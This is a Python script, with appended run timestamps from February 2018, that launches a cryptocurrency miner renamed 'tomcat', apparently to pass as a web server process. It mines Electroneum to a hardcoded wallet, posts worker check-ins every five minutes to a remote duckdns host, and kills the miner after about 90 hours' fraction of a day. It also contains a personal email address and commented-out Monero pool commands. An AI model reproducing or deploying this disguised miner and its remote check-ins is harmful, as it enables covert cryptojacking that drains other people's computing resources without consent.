import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:35:06.522279
#2018-02-17 17:23:04.443096
#2018-02-17 19:12:01.280888
#2018-02-17 21:01:03.778134
#2018-02-17 22:46:05.079710
#2018-02-18 00:29:04.972153
#2018-02-18 02:20:01.616840
#2018-02-18 04:07:05.115782
#2018-02-18 05:57:05.544951
#2018-02-18 07:48:07.938769
#2018-02-18 09:36:01.258350
#2018-02-18 11:22:05.376146
#2018-02-18 13:08:06.143087
#2018-02-18 14:56:01.733483
#2018-02-18 16:44:02.132405
#2018-02-18 18:33:01.655401
#2018-02-18 20:21:04.980413
#2018-02-18 22:07:04.486151
#2018-02-18 23:55:06.947626
#2018-02-19 01:43:05.518015
#2018-02-19 03:31:08.158355
#2018-02-19 05:16:06.019641
#2018-02-19 07:03:04.931063
#2018-02-19 08:52:07.285025
#2018-02-19 10:41:07.073575
#2018-02-19 12:28:06.726229
#2018-02-19 14:14:06.824567
#2018-02-19 16:03:07.151339
#2018-02-19 17:51:01.363029
#2018-02-19 19:37:07.218397
#2018-02-19 21:25:06.989990
#2018-02-19 23:11:05.338867
#2018-02-20 00:56:05.491619
#2018-02-20 02:46:04.961818
#2018-02-20 04:34:07.720483
#2018-02-20 06:18:03.755564
#2018-02-20 08:03:04.987613
#2018-02-20 09:48:05.497881
#2018-02-20 11:32:01.765864
#2018-02-20 13:20:05.170919
#2018-02-20 15:04:07.452111
#2018-02-20 16:49:12.660202
#2018-02-20 18:37:05.021509
#2018-02-20 20:27:08.145933
#2018-02-20 22:13:07.743193
#2018-02-20 23:53:08.345090
#2018-02-21 01:37:06.655226
#2018-02-21 03:25:07.376568
#2018-02-21 05:13:01.785392
#2018-02-21 07:02:01.281654
#2018-02-21 08:48:06.906589
#2018-02-21 10:36:02.027120
#2018-02-21 12:23:01.787730
#2018-02-21 14:09:07.368587
#2018-02-21 15:56:07.272306
#2018-02-21 17:48:02.224772
#2018-02-21 19:35:04.705750
#2018-02-21 21:22:08.412967
#2018-02-21 23:08:04.912643
#2018-02-22 00:55:07.057659
#2018-02-22 02:44:04.459416
#2018-02-22 04:31:01.751975
#2018-02-22 06:16:03.992402
#2018-02-22 08:02:06.623217
#2018-02-22 09:51:07.709400
#2018-02-22 11:36:11.739426
#2018-02-22 13:23:08.651587
#2018-02-22 15:13:06.402207
#2018-02-22 16:59:06.968208
#2018-02-22 18:48:09.311215
#2018-02-22 20:41:07.026378
#2018-02-22 22:28:07.793248
#2018-02-23 00:13:06.563721
#2018-02-23 02:00:08.378640
#2018-02-23 03:48:08.414544
#2018-02-23 05:36:05.154849
#2018-02-23 07:21:04.931582
#2018-02-23 09:25:03.807037
#2018-02-23 11:32:07.126094
#2018-02-23 13:23:06.127864
#2018-02-23 15:09:06.421393
#2018-02-23 16:59:10.197703
#2018-02-23 18:45:05.835140
#2018-02-23 20:32:04.156339
#2018-02-23 22:19:05.223120
#2018-02-24 00:04:01.328258
#2018-02-24 01:54:05.374310
#2018-02-24 03:47:07.828211
#2018-02-24 05:38:04.807207
#2018-02-24 07:26:06.296749
#2018-02-24 09:15:09.615985
#2018-02-24 11:11:04.945375
#2018-02-24 13:00:10.508159
#2018-02-24 14:47:06.618007
#2018-02-24 16:39:04.927899
#2018-02-24 18:27:07.795825
#2018-02-24 20:14:03.572726
#2018-02-24 22:04:03.712095
#2018-02-25 02:32:08.402252
#2018-02-25 06:13:07.563384
#2018-02-25 11:40:09.622312